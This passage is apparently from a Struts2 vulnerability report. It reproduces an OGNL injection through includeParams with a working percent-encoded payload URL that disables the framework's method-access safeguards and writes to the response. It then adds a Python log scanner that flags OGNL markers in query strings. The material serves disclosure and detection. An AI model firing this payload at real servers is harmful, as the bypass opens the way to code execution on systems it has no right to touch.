...
- Open HelloWorld.jsp present in the Struts Blank App and add the parameter includeParams="all" to one of the url/a tags (it also works with includeParams="get"), so that the line looks something like this:

    <s:url id="url" action="HelloWorld" includeParams="all">
- Run struts2-blank app
- Open the url: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
(this is the shortened version http://goo.gl/lhlTl)
As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter.
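Since an unexpected parameter such as fakeParam cannot be escaped by the application, the practical defensive measures are to keep includeParams at "none" and to watch request logs for OGNL expression markers arriving in query strings. The following detector is an added example written for this page, not code from the Struts project or the original report: it percent-decodes each request's query string and flags the delimiters and object names that an OGNL injection attempt needs to carry. The access-log format (Apache common log format) and the two sample lines are constructed assumptions; the flagged line carries only a harmless arithmetic expression.

```python
"""Flag OGNL expression markers in URL query strings (added example, not the page's own code)."""
from urllib.parse import urlsplit, unquote

# Substrings that have no business appearing in a decoded query string of a
# Struts application; "%{" and "${" are the OGNL expression delimiters.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "#context", "@org.apache.struts2")


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly until the string stops changing.

    One pass turns %25%7B into %{ ; extra rounds catch double-encoded input.
    The round limit avoids looping on pathological input.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_markers(url_or_path):
    """Return the list of OGNL markers present in the decoded query string."""
    query = urlsplit(url_or_path).query
    decoded = decode_fully(query)
    return [marker for marker in OGNL_MARKERS if marker in decoded]


# Constructed sample in Apache common log format (assumption about log layout).
SAMPLE_LOG = [
    '127.0.0.1 - - [10/May/2013:10:00:00 +0000] "GET /example/HelloWorld.action?name=Bob%20Smith HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/May/2013:10:00:01 +0000] "GET /example/HelloWorld.action?fakeParam=%25%7B1%2B1%7D HTTP/1.1" 200 512',
]


def scan_access_log(lines):
    """Return (request path, markers) for every log line whose query carries OGNL markers."""
    hits = []
    for line in lines:
        # The request line sits between the first pair of double quotes:
        # "GET /path?query HTTP/1.1"
        try:
            request = line.split('"')[1]
            path = request.split()[1]
        except IndexError:
            continue  # malformed line, skip it
        markers = find_ognl_markers(path)
        if markers:
            hits.append((path, markers))
    return hits


if __name__ == "__main__":
    for path, markers in scan_access_log(SAMPLE_LOG):
        print(f"suspicious request {path!r}: {markers}")
```

The check is deliberately applied to the whole query string rather than to known parameter names, because, as the report notes, the dangerous value arrives in a parameter the application never declared.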
...